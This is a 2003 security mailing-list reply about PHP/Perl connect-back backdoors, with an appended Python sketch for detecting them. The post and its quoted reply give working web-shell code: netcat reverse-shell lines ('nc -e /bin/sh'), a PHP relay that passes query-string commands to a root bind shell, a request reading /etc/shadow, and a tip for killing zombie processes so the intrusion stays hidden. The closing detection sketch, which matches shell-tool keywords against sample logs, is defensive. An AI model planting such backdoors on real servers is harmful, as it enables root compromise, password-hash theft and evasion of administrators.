Re: perl/php connect-back backdoor?

From: Diode Trnasistor (ffddfe_at_yahoo.com)
Date: 07/30/03

    Date: Wed, 30 Jul 2003 03:28:41 -0700 (PDT)
    To: "Knud_Erik_Højgaard" <kain@ircop.dk>, Ingram <Vail@gmx.net>, vuln-dev@securityfocus.com
    
    

    Hi,

    I've been using this technique for a while. If you
    can upload a php or a perl file which gets executed in
    the server context you already won, regardless of
    firewall rules. The obvious method is the connect
    back (i.e. nc -e /bin/sh x.x.x.x 80 as that's the
    likely allowed outbound port). If that's a no go,
    and there's absolutely no way to establish a
    session, you still win.

    Consider this:
    <?
       `exploit which gets root and calls nc -e /bin/sh -l
    -p 9999`
    ?>

    then another script:
    <?
       $z = `echo $x | nc localhost 999`;
       $z=str_replace("\n", "<br>", $z);
       echo $z;
    ?>

    As is obvious, call the second script and you have
    somewhat of a crippled root shell.

    www.target.com/script2.php?x=cat /etc/shadow

    you get the point :P

    PS: the silly thing about this is that each command
    you execute this way ends up as a zombie process.
    In a few minutes of working with this "shell" you'll
    have hundreds of zombie processes on the target
    machine. What I like to do is run zkill (zkill.c
    google it) slightly modified to terminate all zombies.
     This way it's less obvious that something very odd is
    going on.

    --- Knud_Erik_Højgaard <kain@ircop.dk> wrote:
    > Ingram wrote:
    > [snip]
    > > i got right now is uid www. I think a connect-back perl/php code
    > > could make it through this packetfilter, as the outbound rules could
    > > be less tight.
    > >
    > > Anyone aware of a backdoor like this?
    > netcat:
    > <? passthru("nc -e /bin/sh ip port"); ?>
    >
    > or a cronjob doing the same..
    >
    > --
    > kokanin

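For defenders, the message above names two traces this technique leaves behind: shell commands carried in a query string, and defunct processes piling up under one parent. The following detection sketch is an added example, not part of the original post; the regex heuristic, the threshold, the function names and all sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Heuristic (assumed, tune per application): value starts a shell command or names a sensitive file.
SHELL_HINT = re.compile(
    r"(?:^|[;|&`$(])\s*(?:cat|id|uname|ls|nc|wget|curl|sh|bash|perl)(?:\s|$)"
    r"|/etc/(?:passwd|shadow)")
REQUEST = re.compile(r'(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (.+?) HTTP/[\d.]+"')

def suspicious_requests(access_log_lines):
    """Return (client, path, param, value) for query values that look like commands."""
    hits = []
    for line in access_log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if SHELL_HINT.search(value):
                hits.append((client, parts.path, name, value))
    return hits

def zombie_parents(ps_lines, threshold=3):
    """From `ps -eo pid,ppid,user,stat,comm` output: {ppid: count} of defunct (Z) children."""
    counts = Counter()
    for line in ps_lines:
        f = line.split(None, 4)
        if len(f) == 5 and f[0].isdigit() and f[3].startswith("Z"):
            counts[int(f[1])] += 1
    return {ppid: n for ppid, n in counts.items() if n >= threshold}

# Constructed sample data (not from the original post); 192.0.2.x is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jul/2003:03:20:01 -0700] "GET /index.php?page=catalog HTTP/1.0" 200 512',
    '192.0.2.77 - - [30/Jul/2003:03:21:14 -0700] "GET /script2.php?x=cat%20/etc/shadow HTTP/1.0" 200 901',
    '192.0.2.77 - - [30/Jul/2003:03:21:40 -0700] "GET /script2.php?x=id HTTP/1.0" 200 48',
]
SAMPLE_PS = [
    "  PID  PPID USER     STAT COMMAND",
    "  812     1 root     Ss   httpd",
    " 4101  4100 root     Z    sh <defunct>",
    " 4102  4100 root     Z    sh <defunct>",
    " 4103  4100 root     Z    sh <defunct>",
]

if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG), zombie_parents(SAMPLE_PS))
```

Neither signal is conclusive alone; correlating a flagged request time with new outbound or loopback connections from the web server account narrows false positives.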

